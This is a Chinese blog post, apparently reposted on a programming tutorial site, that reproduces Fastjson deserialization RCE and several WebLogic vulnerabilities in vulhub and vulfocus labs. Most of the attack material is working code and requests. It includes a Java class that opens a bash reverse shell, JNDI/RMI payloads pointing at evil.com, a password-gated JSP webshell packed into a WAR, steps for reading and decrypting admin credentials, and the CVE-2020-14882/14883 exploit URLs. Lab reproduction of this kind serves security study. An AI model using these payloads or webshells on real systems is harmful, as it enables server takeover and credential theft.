开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> Java知识库 -> Java安全-Java Vuls（Fastjson、Weblogic漏洞复现） -> 正文阅读

[Java知识库]Java安全-Java Vuls（Fastjson、Weblogic漏洞复现）

复现几个 Java 的漏洞，文章会分多篇这是第一篇，文章会分组件和中间件两个角度进行漏洞复现

复现使用环境

文章目录

组件
- Fastjson 1.2.24 反序列化 RCE
- Fastjson 1.2.47 反序列化 RCE
中间件

组件

Fastjson 1.2.24 反序列化 RCE

FastJson 库是 Java 的一个 Json 库，其作用是将 Java 对象转换成 json 数据来表示，也可以将 json 数据转换成 Java 对象

在 1.2.24 版本的 Fastjson 出现了一个反序列化的漏洞，fastjson 在解析 json 的过程中，支持使用 autoType 来实例化某一个具体的类，并调用该类的 set/get 方法来访问属性

因为目标环境是 Java 8u102，没有 com.sun.jndi.rmi.object.trustURLCodebase 的限制，我们可以使用 com.sun.rowset.JdbcRowSetImpl 的利用链，借助 JNDI 注入来执行命令，漏洞利用过程与 Log4j、jackson jdni 注入一致

1.创建恶意类并生成 class 字节码文件

import java.lang.Runtime;
import java.lang.Process;

public class Test {
   static {
       try {
          Runtime r = Runtime.getRuntime();
          Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/IP/PORT 0>&1"});
          p.waitFor();
       } catch (Exception e) {
           // do nothing
       }
   }
}

注意代码中 IP 为 VPS IP 端口为 NC 监听端口，在命令行中使用命令生成字节码文件

2.将字节码文件上传至 VPS，使用 python 开一个 web 服务，确保可以下载 class 文件

python3 -m http.server 8888

3.借助 marshalsec 项目，启动一个 RMI 服务器，监听9999 端口，并制定加载远程类 Test.class

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://evil.com/#TouchFile" 9999

4.向靶场服务器发送 Payload，带上 RMI 的地址：

POST / HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://evil.com:9999/TouchFile",
        "autoCommit":true
    }
}

特别注意：在 Java 漏洞复现中需要特别注意 HTTP 请求头真的会影响，所以复现中使用上面代码块中的 payload

如果直接是 burp 抓包，改请求方式，不会利用成功，如下图，因为 Content-Type 不对

执行步骤如图所示

正是因为在 vps 上需要开三个服务所以显得很乱

Fastjson 1.2.47 反序列化 RCE

Fastjson 于 1.2.24 版本后增加了反序列化白名单，而在 1.2.48 以前的版本中，攻击者可以利用特殊构造的 json 字符串绕过白名单检测，成功执行任意命令

环境用 vulhub

执行如下命令启动一个spring web项目，其中使用 fastjson 作为默认 json 解析器：
docker-compose up -d
环境启动后，访问http://your-ip:8090即可看到一个json对象被返回，我们将content-type修改为application/json后可向其POST新的JSON对象，后端会利用fastjson进行解析

vulhub 提供的目标环境是openjdk:8u102，这个版本没有com.sun.jndi.rmi.object.trustURLCodebase的限制，可以使用 rmi 进行命令执行

复现方法一致，payload 利用其缓存机制可实现对未开启 autotype 功能的绕过

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://evil.com:9999/Exploit",
        "autoCommit":true
    }
}

中间件

weblogic 漏洞不止这几个

Weblogic 文件读取&war包上传（Vulhub）

环境所在 vulhub 目录，weblogic 挺大的可以用 vulfocus 的环境

/vulhub-master/weblogic/weak_password

开启环境后，访问http://your-ip:7001/console，即为weblogic后台

记录以下这个样子

环境存在弱口令：

weblogic
Oracle@123

weblogic常用弱口令： http://cirt.net/passwords?criteria=weblogic

如果存在弱口令就可以直接进入后台上传 war 部署后门就行了，这也是 Java 中间件普遍利用方法

这套环境模拟了一个任意文件下载漏洞，对并不是说 weblogic 的任意文件读取

http://your-ip:7001/hello/file.jsp?path=/etc/passwd

尝试读取敏感文件

weblogic密码使用AES（老版本3DES）加密，对称加密可解密，只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下，名为SerializedSystemIni.dat和config.xml，在本环境中为./security/SerializedSystemIni.dat和./config/config.xml（基于当前目录/root/Oracle/Middleware/user_projects/domains/base_domain）

尝试读取 SerializedSystemIni.dat 这是一个二进制文件，所以一定要用 burpsuite 来读取，用浏览器直接下载可能引入一些干扰字符。在 burp 里选中读取到的那一串乱码，右键 copy to file 就可以保存成一个文件

config/config.xml是 base_domain 的全局配置文件，所以乱七八糟的内容比较多，找到其中的<node-manager-password-encrypted>的值，即为加密后的管理员密码

对于这个密码在 vulhub 的环境中也提供了解密工具，GitHub 上也有整理好的工具，链接

weblogic_decrypt.jar

这个工具要和 lib 在一个目录启动

密码一致，解密成功，可以登录后台上传 webshell

1.首先生成后门 test.jsp

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

构造 war 包

jar cvf test.war test.jsp

值得注意的是，我们平时 tomcat 用的 war 包不一定能够成功，你可以将你的 webshell 放到本项目的 web/hello.war 这个压缩包中

使用这种方法要注意应用目录在 war 包中 WEB-INF/weblogic.xml 里指定（因为本测试环境已经使用了/hello这个目录，所以你要在本测试环境下部署 shell，需要修改这个目录，比如修改成其他的）

进入后台，部署，点击安装

点击上载文件，选择文件

存放路径

/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/upload/test.war

一路 next 直到完成部署，访问后门

Weblogic 任意文件上传 CVE-2018-2894

WebLogic 管理端未授权的两个页面存在任意上传 getshell 漏洞，可直接获取权限。两个页面分别为 /ws_utc/begin.do，/ws_utc/config.do，Web Service Test Page，在 “生产模式” 下默认不开启，所以该漏洞有一定限制

环境启动后，访问http://your-ip:7001/console，即可看到后台登录页面。

执行docker-compose logs | grep password可查看管理员密码，管理员用户名为weblogic

登录后台页面，点击base_domain的配置，在“高级”中开启“启用 Web 服务测试页”选项，开启了的就存在此漏洞了

漏洞存在于 http://your-ip:7001/ws_utc/config.do

可以发现此界面访问无需登录，设置 Work Home Dir为/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

将目录设置为ws_utc应用的静态文件css目录，访问这个目录是无需权限的，这一点很重要

然后点击安全 -> 增加，然后上传 webshell，并抓包

查看返回包

或者不抓包上传后 F12 审查元素

然后访问

 http://your-ip:7001/ws_utc/css/config/keystore/[时间戳]_[文件名]

直接可以执行命令了，weblogic 真养活半个安全圈

Weblogic 管理控制台未授权远程命令执行漏洞（CVE-2020-14882，CVE-2020-14883）

CVE-2020-14882 允许未授权的用户绕过管理控制台的权限验证访问后台，CVE-2020-14883 允许后台任意用户通过 HTTP 协议执行任意命令。使用这两个漏洞组成的利用链，可通过一个 GET 请求在远程 Weblogic 服务器上以未授权的任意用户身份执行命令

复现环境使用 vulfocus

1.首先测试权限绕过漏洞（CVE-2020-14882），访问以下URL，即可未授权访问到管理后台页面：

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal

登录之后目前是权限最低的用户，无法安装应用也无法执行代码

2.利用到第二个漏洞CVE-2020-14883 通过 HTTP 协议执行任意命令。这个漏洞的利用方式有两种：

通过com.tangosol.coherence.mvel2.sh.ShellSession

直接访问如下URL，即可利用com.tangosol.coherence.mvel2.sh.ShellSession执行命令
```
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")
```
这个利用方法只能在 Weblogic 12.2.1 以上版本利用，因为 10.3.6 并不存在com.tangosol.coherence.mvel2.sh.ShellSession类

通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

这是一种更为通杀的方法，最早在 CVE-2019-2725 被提出，对于所有 Weblogic 版本均有效。

首先，我们需要构造一个XML文件，并将其保存在Weblogic可以访问到的服务器上，如http://example.com/rce.xml：

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[touch /tmp/success2]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

然后通过如下URL，即可让Weblogic加载这个XML，并执行其中的命令：

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://example.com/rce.xml")